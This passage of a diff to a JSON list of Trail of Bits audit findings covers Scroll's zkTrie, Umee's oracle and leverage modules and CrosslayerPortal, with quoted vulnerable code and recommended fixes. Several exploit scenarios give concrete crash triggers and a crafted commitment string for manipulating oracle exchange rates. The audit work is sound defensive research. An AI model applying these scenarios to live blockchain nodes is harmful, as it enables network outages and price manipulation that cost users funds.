midHash, err := LeafHash(proof.NodeAux.Key, proof.NodeAux.Value) if err != nil { return nil, err } return proof.rootFromProof(midHash, nodeKey) } } } Figure 4.1: The Proof.Verify method (zktrie/trie/zk_trie_impl.go#609-632) When a non-inclusion proof is generated, the BuildZkTrieProof function looks up the other leaf node and uses its NodeKey and valueHash fields to populate the Key and Value fields of NodeAux, as shown in figure 4.2.
However, the valueHash field of this node may be nil, causing NodeAux.Value to be nil and causing proof verification to crash with a nil pointer dereference error, which can be triggered by the test case shown in figure 4.3. n, err := getNode(nextHash) if err != nil { return nil, nil, err } switch n.Type { case NodeTypeEmpty: return p, n, nil case NodeTypeLeaf: if bytes.Equal(kHash[:], n.NodeKey[:]) { p.Existence = true return p, n, nil } // We found a leaf whose entry didn't match hIndex p.NodeAux = &NodeAux{Key: n.NodeKey, Value: n.valueHash} return p, n, nil Figure 4.2: Populating NodeAux (zktrie/trie/zk_trie_impl.go#560-574) func TestMerkleTree_GetNonIncProof(t *testing.T) { zkTrie := newTestingMerkle(t, 10) t.Run(\"Testing for non-inclusion proofs\", func(t *testing.T) { k := zkt.Byte32{1} k_value := (&[1]zkt.Byte32{{1}})[:] k_other := zkt.Byte32{2} k_hash_int, _ := k.Hash() k_other_hash_int, _ := k_other.Hash() k_hash := zkt.NewHashFromBigInt(k_hash_int) k_other_hash := zkt.NewHashFromBigInt(k_other_hash_int) assert.Nil(t, zkTrie.TryUpdate(k_hash, 0, k_value)) getNode := func(hash *zkt.Hash) (*Node, error) { return zkTrie.GetNode(hash) } proof, _, err := BuildZkTrieProof(zkTrie.rootHash, k_other_hash_int, 10, getNode) assert.Nil(t, err) assert.False(t, proof.Existence) proof_root, _ := proof.Verify(nil, k_other_hash) assert.Equal(t, proof_root, zkTrie.rootHash) }) } Figure 4.3: A test case that will crash with a nil dereference of NodeAux.Value Adding a call to n.NodeHash() inside BuildZkTrieProof, as shown in figure 4.4, fixes this problem. n, err := getNode(nextHash) if err != nil { return nil, nil, err } switch n.Type { case NodeTypeEmpty: return p, n, nil case NodeTypeLeaf: if bytes.Equal(kHash[:], n.NodeKey[:]) { p.Existence = true return p, n, nil } // We found a leaf whose entry didn't match hIndex if _, err := n.NodeHash(); err != nil { return nil, nil, err } p.NodeAux = &NodeAux{Key: n.NodeKey, Value: n.valueHash} return p, n, nil Figure 4.4: Adding the highlighted n.NodeHash() call fixes this problem. (zktrie/trie/zk_trie_impl.go#560-574) Exploit Scenario An adversary or ordinary user requests that the software generate and verify a non-inclusion proof, and the software crashes, leading to the loss of service. Recommendations Short term, fix BuildZkTrieProof by adding a call to n.NodeHash(), as described above. Long term, ensure that all major code paths in important functions, such as proof generation and verification, are tested. The Go coverage analysis report generated by the command go test -cover -coverprofile c.out && go tool cover -html=c.out shows that this branch in Proof.Verify is not currently tested: Figure 4.5: The Go coverage analysis report 5. Leaf nodes with different values may have the same hash Severity: High Difficulty: Medium Type: Cryptography Finding ID: TOB-ZKTRIE-5 Target: trie/zk_trie_node.go, types/util.go", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: High" + "Difficulty: Low" ] }, { - "title": "29. Use of legacy openssl version in CrosslayerPortal tests ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The CrosslayerPortal project uses a legacy version of openssl to run tests. While this version is not exposed in production, the use of outdated security protocols may be risky (figure 29.1).
An unexpected error occurred: Error: error:0308010C:digital envelope routines::unsupported at new Hash (node:internal/crypto/hash:67:19) at Object.createHash (node:crypto:130:10) at hash160 (~/CrosslayerPortal/node_modules/ethereum-cryptography/vendor/hdkey-without-crypto.js:249:21 ) at HDKey.set (~/CrosslayerPortal/node_modules/ethereum-cryptography/vendor/hdkey-without-crypto.js:50:24) at Function.HDKey.fromMasterSeed (~/CrosslayerPortal/node_modules/ethereum-cryptography/vendor/hdkey-without-crypto.js:194:20 ) at deriveKeyFromMnemonicAndPath (~/CrosslayerPortal/node_modules/hardhat/src/internal/util/keys-derivation.ts:21:27) at derivePrivateKeys (~/CrosslayerPortal/node_modules/hardhat/src/internal/core/providers/util.ts:29:52) at normalizeHardhatNetworkAccountsConfig (~/CrosslayerPortal/node_modules/hardhat/src/internal/core/providers/util.ts:56:10) at createProvider (~/CrosslayerPortal/node_modules/hardhat/src/internal/core/providers/construction.ts:78:59) at ~/CrosslayerPortal/node_modules/hardhat/src/internal/core/runtime-environment.ts:80:28 { opensslErrorStack: [ 'error:03000086:digital envelope routines::initialization error' ], library: 'digital envelope routines', reason: 'unsupported', code: 'ERR_OSSL_EVP_UNSUPPORTED' } Figure 29.1: Errors flagged in npx hardhat testing Recommendations Short term, refactor the code to use a new version of openssl to prevent the exploitation of openssl vulnerabilities. Long term, avoid using outdated or legacy versions of dependencies. 22. Commented-out and unimplemented conditional statements Severity: Undetermined Difficulty: Low Type: Undefined Behavior Finding ID: TOB-CMP-22 Target: apyhunter-tricrypto/contracts/sushiswap/SushiSlpStrategy.sol", + "title": "6. Empty UpdatePreimage function body ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "The UpdatePreimage function implementation for the Database receiver type is empty. Instead of an empty function body, the function should either panic with an unimplemented message or log a warning. This would prevent the function from being used without any warning. func (db *Database) UpdatePreimage([]byte, *big.Int) {} Figure 6.1: zktrie/trie/zk_trie_database.go#19 Recommendations Short term, add an unimplemented message to the function body, through either a panic or message logging.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: High" + "Severity: Informational", + "Difficulty: N/A" ] }, { - "title": "23. Error-prone NFT management in the Summoner contract ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The Summoner contract's ability to hold NFTs in a number of states may create confusion regarding the contract's states and the differences between the contracts. For instance, the Summoner contract can hold the following kinds of NFTs: NFTs that have been pre-minted by Composable Finance and do not have metadata attached to them; original NFTs that have been locked by the Summoner for minting on the destination chain; and MosaicNFT wrapper tokens, which are copies of NFTs that have been locked and are intended to be minted on the destination chain. As the system is scaled, the number of NFTs held by the Summoner, especially the number of pre-minted NFTs, will increase significantly. Recommendations Simplify the NFT architecture; see the related recommendations in Appendix E.", + "title": "7. 
CanonicalValue is not canonical ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "The CanonicalValue function does not uniquely generate a representation of Node structures, allowing different Nodes with the same CanonicalValue, and two nodes with the same NodeHash but different CanonicalValues. ValuePreimages in a Node can be either uncompressed or compressed (by hashing); the CompressedFlags value indicates which data is compressed. Only the first 24 fields can be compressed, so CanonicalValue truncates CompressedFlags to the first 24 bits. But NewLeafNode accepts any uint32 for the CompressedFlags field of a Node. Figure 7.3 shows how this can be used to construct two different Node structs that have the same CanonicalValue. // CanonicalValue returns the byte form of a node required to be persisted, and strip unnecessary fields // from the encoding (current only KeyPreimage for Leaf node) to keep a minimum size for content being // stored in backend storage func (n *Node) CanonicalValue() []byte { switch n.Type { case NodeTypeParent: // {Type || ChildL || ChildR} bytes := []byte{byte(n.Type)} bytes = append(bytes, n.ChildL.Bytes()...) bytes = append(bytes, n.ChildR.Bytes()...) return bytes case NodeTypeLeaf: // {Type || Data...} bytes := []byte{byte(n.Type)} bytes = append(bytes, n.NodeKey.Bytes()...) tmp := make([]byte, 4) compressedFlag := (n.CompressedFlags << 8) + uint32(len(n.ValuePreimage)) binary.LittleEndian.PutUint32(tmp, compressedFlag) bytes = append(bytes, tmp...) for _, elm := range n.ValuePreimage { bytes = append(bytes, elm[:]...) } bytes = append(bytes, 0) return bytes case NodeTypeEmpty: // { Type } return []byte{byte(n.Type)} default: return []byte{} } } Figure 7.1: This figure shows the CanonicalValue computation. The highlighted code assumes that CompressedFlags is 24 bits. (zktrie/trie/zk_trie_node.go#187-214) // NewLeafNode creates a new leaf node. func NewLeafNode(k *zkt.Hash, valueFlags uint32, valuePreimage []zkt.Byte32) *Node { return &Node{Type: NodeTypeLeaf, NodeKey: k, CompressedFlags: valueFlags, ValuePreimage: valuePreimage} } Figure 7.2: Node construction in NewLeafNode (zktrie/trie/zk_trie_node.go#55-58) // CanonicalValue implicitly truncates CompressedFlags to 24 bits. This test should ideally fail. func TestZkTrie_CanonicalValue1(t *testing.T) { key, err := hex.DecodeString(\"0000000000000000000000000000000000000000000000000000000000000000\") assert.NoError(t, err) vPreimage := []zkt.Byte32{{0}} k := zkt.NewHashFromBytes(key) vFlag0 := uint32(0x00ffffff) vFlag1 := uint32(0xffffffff) lf0 := NewLeafNode(k, vFlag0, vPreimage) lf1 := NewLeafNode(k, vFlag1, vPreimage) // These two assertions should never simultaneously pass. 
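// lf0 and lf1 differ only in the top eight bits of CompressedFlags; CanonicalValue
// computes (CompressedFlags << 8) + len(ValuePreimage) as a uint32, so those top
// bits are shifted out and both nodes serialize identically.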
assert.True(t, lf0.CompressedFlags != lf1.CompressedFlags) assert.True(t, reflect.DeepEqual(lf0.CanonicalValue(), lf1.CanonicalValue())) } Figure 7.3: A test showing that one can construct different nodes with the same CanonicalValue // PreHandlingElems turn persisted byte32 elements into field arrays for our hashElem // it also has the compressed byte32 func PreHandlingElems(flagArray uint32, elems []Byte32) (*Hash, error) { ret := make([]*big.Int, len(elems)) var err error for i, elem := range elems { if flagArray&(1<< [...] 4 || len(msg.Salt) < 1 { return sdkerrors.Wrap(ErrInvalidSaltLength, \"salt length must be [1, 4]\") } Figure 3.2: The salt-validation logic ( umee/x/oracle/types/msgs.go#148-150 ) The second issue is the lack of proper salt validation, which would guarantee sufficient domain separation between a random salt and the exchange rate when the commitment hash is calculated. The domain separator string consists of a colon character, as shown in figure 3.3. However, there is no verification of whether the salt is a hex-encoded string or whether it contains the separator character; only the length of the salt is validated. This bug could allow an attacker to reveal an exchange rate other than the one the attacker had committed to, violating the binding property of the scheme. func GetAggregateVoteHash(salt string, exchangeRatesStr string, voter sdk.ValAddress) AggregateVoteHash { hash := tmhash.NewTruncated() sourceStr := fmt.Sprintf(\"%s:%s:%s\", salt, exchangeRatesStr, voter.String()) Figure 3.3: The generation of a commitment hash ( umee/x/oracle/types/hash.go#23-25 ) The last vulnerability in the scheme is the insufficient validation of exchange rate strings: the strings undergo unnecessary trimming, and the code checks only that len(denomAmountStr) is less than two (figure 3.4), rather than performing a stricter check to confirm that it is not equal to two. This could allow an attacker to exploit the second bug described in this finding. func ParseExchangeRateTuples(tuplesStr string) (ExchangeRateTuples, error) { tuplesStr = strings.TrimSpace(tuplesStr) if len(tuplesStr) == 0 { return nil, nil } tupleStrs := strings.Split(tuplesStr, \",\") // (...) for i, tupleStr := range tupleStrs { denomAmountStr := strings.Split(tupleStr, \":\") if len(denomAmountStr) < 2 { return nil, fmt.Errorf(\"invalid exchange rate %s\", tupleStr) } } // (...) } Figure 3.4: The code that parses exchange rates ( umee/x/oracle/types/vote.go#72-86 ) Exploit Scenario The maximum salt length of two is increased. During a subsequent pre-voting period, a malicious validator submits the following commitment hash: sha256(\"whatever:UMEE:123:␣UMEE:456,USDC:789:addr\"). (Note that ␣ represents a normal whitespace character.) Then, during the voting period, the attacker waits for all other validators to reveal their exchange rates and salts and then chooses the UMEE price that he will reveal (123 or 456). In this way, the attacker can manipulate the exchange rate to his advantage. If the attacker chooses to reveal a price of 123, the following will occur: 1. The salt will be set to whatever. 2. The attacker will submit an exchange rate string of UMEE:123:␣UMEE:456,USDC:789. 3. The value will be hashed as sha256( whatever : UMEE:123:␣UMEE:456,USDC:789 : addr). 4. The exchange rate will then be parsed as 123/789 (UMEE/USDC). Note that ␣UMEE = 456 (with its leading whitespace character) will be ignored.
This is because of the insufficient validation of exchange rate strings (as described above) and the fact that only the first and second items of denomAmountStr are used. (See the screenshot in Appendix D.) If the attacker chooses to reveal a price of 456, the following will occur: 1. The salt will be set to whatever:UMEE:123. 2. The exchange rate string will be set to ␣UMEE:456,USDC:789. 3. The value will be hashed as sha256( whatever:UMEE:123 : ␣UMEE:456,USDC:789 : addr). 4. Because exchange rate strings undergo space trimming, the exchange rate will be parsed as 456/789 (UMEE/USDC). Recommendations Short term, take the following steps: Increase the salt length to prevent brute-force attacks. To ensure a security level of X bits, use salts of 2*X random bits. For example, for a 128-bit security level, use salts of 256 bits (32 bytes). Ensure domain separation by implementing validation of a salt's format and accepting only hex-encoded strings. Implement stricter validation of exchange rates by ensuring that every exchange rate substring contains exactly one colon character and checking whether all denominations are included in the list of accepted denominations; also avoid trimming whitespaces at the beginning of the parsing process. Long term, consider replacing the truncated SHA-256 hash function with a SHA-512/256 or HMAC-SHA256 function. This will increase the level of security from 80 bits to about 128, which will help prevent collision and length extension attacks.", + "title": "11. The hash_external function panics with integers larger than 32 bytes ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "The hash_external function will cause a runtime error due to an out-of-bounds access if the input integers are larger than 32 bytes. func hash_external(inp []*big.Int) (*big.Int, error) { if len(inp) != 2 { return big.NewInt(0), errors.New(\"invalid input size\") } a := zkt.ReverseByteOrder(inp[0].Bytes()) b := zkt.ReverseByteOrder(inp[1].Bytes()) a = append(a, zeros[0:(32-len(a))]...) b = append(b, zeros[0:(32-len(b))]...) Figure 11.1: zktrie/lib.go#31-39 Exploit Scenario An attacker causes the system to call hash_external with integers larger than 32 bytes, causing the system to experience a runtime error. Recommendations Short term, document the requirement that the input integers be no larger than 32 bytes. If the function is reachable by an adversary, add checks to ensure that the runtime error is not reachable. Long term, carefully check all indexing operations done on adversary-controlled values with respect to out-of-bounds accessing.", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Medium" + "Difficulty: High" ] }, { - "title": "4. Validators can crash other nodes by triggering an integer overflow ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "By submitting a large exchange rate value, a validator can trigger an integer overflow that will cause a Go panic and a node crash. The Umee oracle code checks that each exchange rate submitted by a validator is a positive value with a bit size of less than or equal to 256 (figures 4.1 and 4.2). The StandardDeviation method iterates over all exchange rates and adds up their squares (figure 4.3) but does not check for an overflow. A large exchange rate value will cause the StandardDeviation method to panic when performing multiplication or addition.
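// The checks below (figures 4.1 and 4.2) bound each exchange rate's sign and
// bit length, but nothing bounds the sum of squared deviations that
// StandardDeviation accumulates in figure 4.3.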
func ParseExchangeRateTuples(tuplesStr string) (ExchangeRateTuples, error) { // (...) for i, tupleStr := range tupleStrs { // (...) decCoin, err := sdk.NewDecFromStr(denomAmountStr[1]) // (...) if !decCoin.IsPositive() { return nil, types.ErrInvalidOraclePrice } Figure 4.1: The check of whether the exchange rate values are positive ( umee/x/oracle/types/vote.go#L71-L96 ) func (msg MsgAggregateExchangeRateVote) ValidateBasic() error { // (...) exchangeRates, err := ParseExchangeRateTuples(msg.ExchangeRates) if err != nil { /* (...) - returns wrapped error */ } for _, exchangeRate := range exchangeRates { // check overflow bit length if exchangeRate.ExchangeRate.BigInt().BitLen() > 255+sdk.DecimalPrecisionBits // (...) - returns error Figure 4.2: The check of the exchange rate values bit lengths ( umee/x/oracle/types/msgs.go#L136-L146 ) sum := sdk.ZeroDec() for _, v := range pb { deviation := v.ExchangeRate.Sub(median) sum = sum.Add(deviation.Mul(deviation)) } Figure 4.3: Part of the StandardDeviation method ( umee/x/oracle/types/ballot.go#83-87 ) The StandardDeviation method is called by the Tally function, which is called in the EndBlocker function. This means that an attacker could trigger an overflow remotely in another validator node. Exploit Scenario A malicious validator commits to and then sends a large UMEE exchange rate value. As a result, all validator nodes crash, and the Umee blockchain network stops working. Recommendations Short term, implement overflow checks for all arithmetic operations involving exchange rates. Long term, use fuzzing to ensure that no other parts of the code are vulnerable to overflows.", "labels": [ "Trail of Bits", "Severity: High", - "Difficulty: Medium" + "Difficulty: Low" ] }, { - "title": "5. The repayValue variable is not used after being modified ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "The Keeper.LiquidateBorrow function uses the local variable repayValue to calculate the repayment.Amount value. If repayValue is greater than or equal to maxRepayValue, it is changed to that value. However, the repayValue variable is not used again after being modified, which suggests that the modification could be a bug or a code quality issue. func (k Keeper) LiquidateBorrow( // (...) // repayment cannot exceed borrowed value * close factor maxRepayValue := borrowValue.Mul(closeFactor) repayValue, err := k.TokenValue(ctx, repayment) if err != nil { return sdk.ZeroInt(), sdk.ZeroInt(), err } if repayValue.GTE(maxRepayValue) { // repayment *= (maxRepayValue / repayValue) repayment.Amount = repayment.Amount.ToDec().Mul(maxRepayValue).Quo( repayValue ).TruncateInt() repayValue = maxRepayValue } // (...) Figure 5.1: umee/x/leverage/keeper/keeper.go#L446-L456 We identified this issue by running CodeQL's DeadStoreOfLocal.ql query. Recommendations Short term, review and fix the repayValue variable in the Keeper.LiquidateBorrow function, which is not used after being modified, to prevent related issues in the future.", + "title": "12. Mishandling of cgo.Handles causes runtime errors ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "The interaction between the Rust and Go codebases relies on the use of cgo.Handles. These handles are a way to encode Go pointers between Go and, in this case, Rust. Handles can be passed back to the Go runtime, which will be able to retrieve the original Go value. According to the documentation, it is safe to represent an error with the zero value, as this is an invalid handle. However, the implementation should take this into account when retrieving the Go values from the handle, as both the Value and Delete methods for Handles panic on invalid handles. The codebase contains multiple instances of this behavior. For example, the NewTrieNode function will return 0 if it finds an error: // parse raw bytes and create the trie node //export NewTrieNode func NewTrieNode(data *C.char, sz C.int) C.uintptr_t { bt := C.GoBytes(unsafe.Pointer(data), sz) n, err := trie.NewNodeFromBytes(bt) if err != nil { return 0 } // calculate key for caching if _, err := n.NodeHash(); err != nil { return 0 } return C.uintptr_t(cgo.NewHandle(n)) } Figure 12.1: zktrie/lib.go#73-88 However, neither the Rust API nor the Go API takes these cases into consideration. Looking at the Rust API, the ZkTrieNode::parse function will simply save the result from NewTrieNode regardless of whether it is a valid or invalid Go handle. Then, calling any other function will cause a runtime error due to the use of an invalid handle. This issue is present in all functions implemented for ZkTrieNode: drop, node_hash, and value_hash. We now precisely describe how it fails in the drop function case.
After constructing a malformed ZkTrieNode, the drop function will call FreeTrieNode on the invalid handle: impl Drop for ZkTrieNode { fn drop(&mut self) { unsafe { FreeTrieNode(self.trie_node) }; } } Figure 12.2: zktrie/src/lib.rs#127-131 This will cause a panic given the direct use of the invalid handle on the Handle.Delete function: // free created trie node //export FreeTrieNode func FreeTrieNode(p C.uintptr_t) { freeObject(p) } func freeObject(p C.uintptr_t) { h := cgo.Handle(p) h.Delete() } Figure 12.3: zktrie/lib.go#114-131 The following test triggers the described issue: #[test] fn invalid_handle_drop() { init_hash_scheme(hash_scheme); let _nd = ZkTrieNode::parse(&hex::decode(\"0001\").unwrap()); } // running 1 test // panic: runtime/cgo: misuse of an invalid Handle // goroutine 17 [running, locked to thread]: // runtime/cgo.Handle.Delete(...) // /opt/homebrew/Cellar/go/1.18.3/libexec/src/runtime/cgo/handle.go:137 // main.freeObject(0x14000060d01?) // /zktrie/lib.go:130 +0x5c // main.FreeTrieNode(...) // /zktrie/lib.go:116 Figure 12.4: A test case that triggers the finding in the drop case Exploit Scenario An attacker provides malformed data to ZkTrieNode::parse, causing it to contain an invalid Go handle. This subsequently causes the system to crash when one of the value_hash or node_hash functions is called or eventually when the node variable goes out of scope and the drop function is called. Recommendations Short term, ensure that invalid handles are not used with Delete or Value; for this, document the Go exported function requirements, and ensure that Rust checks for this before these functions are called. Long term, add tests that exercise all return paths for both the Go and Rust libraries.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Medium" + "Severity: Medium", + "Difficulty: Low" ] }, { - "title": "6. Inconsistent error checks in GetSigners methods ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "The GetSigners methods in the x/oracle and x/leverage modules exhibit different error-handling behavior when parsing strings into validator or account addresses. The GetSigners methods in the x/oracle module always panic upon an error, while the methods in the x/leverage module explicitly ignore parsing errors. Figures 6.1 and 6.2 show examples of the GetSigners methods in those modules. We set the severity of this finding to informational because message addresses parsed in the x/leverage module's GetSigners methods are also validated in the ValidateBasic methods. As a result, the issue is not currently exploitable. // GetSigners implements sdk.Msg func (msg MsgDelegateFeedConsent) GetSigners() []sdk.AccAddress { operator, err := sdk.ValAddressFromBech32(msg.Operator) if err != nil { panic(err) } return []sdk.AccAddress{sdk.AccAddress(operator)} } Figure 6.1: umee/x/oracle/types/msgs.go#L174-L182 func (msg *MsgLendAsset) GetSigners() []sdk.AccAddress { lender, _ := sdk.AccAddressFromBech32(msg.GetLender()) return []sdk.AccAddress{lender} } Figure 6.2: umee/x/leverage/types/tx.go#L30-L33 Recommendations Short term, use a consistent error-handling process in the x/oracle and x/leverage modules' GetSigners methods. The x/leverage module's GetSigners functions should handle errors in the same way that the x/oracle methods do, by panicking.", + "title": "13. Unnecessary unsafe pointer manipulation in Node.Data() ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "The Node.Data() function returns the underlying value of a leaf node as a byte slice (i.e., []byte). 
Since the ValuePreimage field is a slice of zkt.Byte32s, returning a value of type []byte requires some form of conversion. The implementation, shown in figure 13.1, uses the reflect and unsafe packages to manually construct a byte slice that overlaps with ValuePreimage. case NodeTypeLeaf: var data []byte hdata := (*reflect.SliceHeader)(unsafe.Pointer(&data)) //TODO: uintptr(reflect.ValueOf(n.ValuePreimage).UnsafePointer()) should be more elegant but only available until go 1.18 hdata.Data = uintptr(unsafe.Pointer(&n.ValuePreimage[0])) hdata.Len = 32 * len(n.ValuePreimage) hdata.Cap = hdata.Len return data Figure 13.1: Unsafe casting from []zkt.Byte32 to []byte (trie/zk_trie_node.go#174-181) Manual construction of slices and unsafe casting between pointer types are error-prone and potentially very dangerous. This particular case appears to be harmless, but it is unnecessary and can be replaced by allocating a byte buffer and copying ValuePreimage into it. Recommendations Short term, replace this unsafe cast with code that allocates a byte buffer and then copies ValuePreimage, as described above. Long term, evaluate all uses of unsafe pointer manipulation and replace them with a safe alternative where possible.", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: High" + "Difficulty: N/A" ] }, { - "title": "7. Incorrect price assumption in the GetExchangeRateBase function ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "If the denominator string passed to the GetExchangeRateBase function contains the substring USD (figure 7.1), the function returns 1, presumably to indicate that the denominator is a stablecoin. If the system accepts an ERC20 token that is not a stablecoin but has a name containing USD, the system will report an incorrect exchange rate for the asset, which may enable token theft. Moreover, the price of an actual USD stablecoin may vary from USD 1. Therefore, if a stablecoin used as collateral for a loan loses its peg, the loan may not be liquidated correctly. + "title": "14. NewNodeFromBytes does not fully validate its input ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "The NewNodeFromBytes function parses a byte array into a value of type Node. It checks several requirements for the Node value and returns nil and an error value if those checks fail. However, it allows a zero-length value for ValuePreimage (which allows TOB-ZKTRIE-10 to be exploited) and ignores extra data at the end of leaf and empty nodes. 
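A minimal sketch of the missing checks (illustrative only; preimageLen, b, and ErrNodeBytesBadSize are the names used in figure 14.1 below, and end stands for the final read offset once all fields have been decoded):

if preimageLen == 0 {
    return nil, ErrNodeBytesBadSize // a leaf must carry at least one value element
}
if end != len(b) {
    return nil, ErrNodeBytesBadSize // reject trailing bytes after the node payload
}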
As shown in figure 14.1, the exact length of the byte array is checked in the case of a branch, but is unchecked for empty nodes and only lower-bounded in the case of a leaf node. case NodeTypeParent: if len(b) != 2*zkt.HashByteLen { return nil, ErrNodeBytesBadSize } n.ChildL = zkt.NewHashFromBytes(b[:zkt.HashByteLen]) n.ChildR = zkt.NewHashFromBytes(b[zkt.HashByteLen : zkt.HashByteLen*2]) case NodeTypeLeaf: if len(b) < zkt.HashByteLen+4 { return nil, ErrNodeBytesBadSize } n.NodeKey = zkt.NewHashFromBytes(b[0:zkt.HashByteLen]) mark := binary.LittleEndian.Uint32(b[zkt.HashByteLen : zkt.HashByteLen+4]) preimageLen := int(mark & 255) n.CompressedFlags = mark >> 8 n.ValuePreimage = make([]zkt.Byte32, preimageLen) curPos := zkt.HashByteLen + 4 if len(b) < curPos+preimageLen*32+1 { return nil, ErrNodeBytesBadSize } [...] if preImageSize != 0 { if len(b) < curPos+preImageSize { return nil, ErrNodeBytesBadSize } n.KeyPreimage = new(zkt.Byte32) copy(n.KeyPreimage[:], b[curPos:curPos+preImageSize]) } case NodeTypeEmpty: break Figure 14.1: preimageLen and len(b) are not fully checked. (trie/zk_trie_node.go#78-111) Recommendations Short term, add checks of the total byte array length and the preimageLen field to NewNodeFromBytes. Long term, explicitly document the serialization format for nodes, and add tests for incorrect serialized nodes.", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: High" + "Difficulty: N/A" ] }, { - "title": "7. Incorrect price assumption in the GetExchangeRateBase function ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "If the denominator string passed to the GetExchangeRateBase function contains the substring USD (figure 7.1), the function returns 1, presumably to indicate that the denominator is a stablecoin. If the system accepts an ERC20 token that is not a stablecoin but has a name containing USD, the system will report an incorrect exchange rate for the asset, which may enable token theft. Moreover, the price of an actual USD stablecoin may vary from USD 1. Therefore, if a stablecoin used as collateral for a loan loses its peg, the loan may not be liquidated correctly. // GetExchangeRateBase gets the consensus exchange rate of an asset // in the base denom (e.g. ATOM -> uatom) func (k Keeper) GetExchangeRateBase(ctx sdk.Context, denom string) (sdk.Dec, error) { if strings.Contains(strings.ToUpper(denom), types.USDDenom) { return sdk.OneDec(), nil } // (...) Figure 7.1: umee/x/oracle/keeper/keeper.go#L89-L94 func (k Keeper) TokenPrice(ctx sdk.Context, denom string) (sdk.Dec, error) { if !k.IsAcceptedToken(ctx, denom) { return sdk.ZeroDec(), sdkerrors.Wrap(types.ErrInvalidAsset, denom) } price, err := k.oracleKeeper.GetExchangeRateBase(ctx, denom) // (...) return price, nil } Figure 7.2: umee/x/leverage/keeper/oracle.go#L12-L34 Exploit Scenario Umee adds the cUSDC ERC20 token as an accepted token. Upon its addition, its price is USD 0.02, not USD 1. However, because of the incorrect price assumption, the system sets its price to USD 1. This enables an attacker to create an undercollateralized loan and to draw funds from the system. Exploit Scenario 2 The price of a stablecoin drops significantly. However, the x/leverage module fails to detect the change and reports the price as USD 1. This enables an attacker to create an undercollateralized loan and to draw funds from the system. 
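The short-term recommendation that follows amounts to deleting this special case so that stablecoins are priced through the oracle like any other accepted asset; a minimal sketch (hypothetical only; getExchangeRate stands in for an assumed oracle lookup helper with no USD shortcut):

func (k Keeper) GetExchangeRateBase(ctx sdk.Context, denom string) (sdk.Dec, error) {
    // No strings.Contains(denom, types.USDDenom) special case: a denom whose
    // name merely contains USD no longer receives a hardcoded price of 1.
    return k.getExchangeRate(ctx, denom) // hypothetical lookup helper
}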
Recommendations Short term, remove the condition that causes the GetExchangeRateBase function to return a price of USD 1 for any asset whose name contains USD.", + "title": "15. init_hash_scheme is not thread-safe ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "zktrie provides a safe-Rust interface around its Go implementation. Safe Rust statically prevents various memory safety errors, including null pointer dereferences and data races. However, when unsafe Rust is wrapped in a safe interface, the unsafe code must provide any guarantees that safe Rust expects. For more information about writing unsafe Rust, consult The Rustonomicon. The init_hash_scheme function, shown in figure 15.1, calls InitHashScheme, which is a cgo wrapper for the Go function shown in figure 15.2. pub fn init_hash_scheme(f: HashScheme) { unsafe { InitHashScheme(f) } } Figure 15.1: src/lib.rs#67-69 // notice the function must use C calling convention //export InitHashScheme func InitHashScheme(f unsafe.Pointer) { hash_f := C.hashF(f) C.init_hash_scheme(hash_f) zkt.InitHashScheme(hash_external) } Figure 15.2: lib.go#65-71 InitHashScheme calls two other functions: first, a C function called init_hash_scheme and second, a second Go function (this time, in the hash module) called InitHashScheme. This second Go function is synchronized with a sync.Once object, as shown in figure 15.3. func InitHashScheme(f func([]*big.Int) (*big.Int, error)) { setHashScheme.Do(func() { hashScheme = f }) } Figure 15.3: types/hash.go#29 However, the C function init_hash_scheme, shown in figure 15.4, performs a completely unsynchronized write to the global variable hash_scheme, which can lead to a data race. void init_hash_scheme(hashF f){ hash_scheme = f; } Figure 15.4: c.go#13-15 However, the only potential data race comes from multi-threaded initialization, which contradicts the usage recommendation in the README, shown in figure 15.5. We must init the crate with a poseidon hash scheme before any actions: zktrie_util::init_hash_scheme(hash_scheme); Figure 15.5: README.md#8-24 Recommendations Short term, add synchronization to C.init_hash_scheme, perhaps by using the same sync.Once object as hash.go. Long term, carefully review all interactions between C and Rust, paying special attention to anything mentioned in the How Safe and Unsafe Interact section of the Rustonomicon.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Medium" + "Severity: Informational", + "Difficulty: N/A" ] }, { - "title": "8. Oracle price-feeder is vulnerable to manipulation by a single malicious price feed ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "The price-feeder component uses a volume-weighted average price (VWAP) formula to compute average prices from various third-party providers. The price it determines is then sent to the x/oracle module, which commits it on-chain. However, an asset price could easily be manipulated by only one compromised or malfunctioning third-party provider. Exploit Scenario Most validators are using the Binance API as one of their price providers. The API is compromised by an attacker and suddenly starts to report prices that are much higher than those reported by other providers. However, the price-feeder instances being used by the validators do not detect the discrepancies in the Binance API prices. 
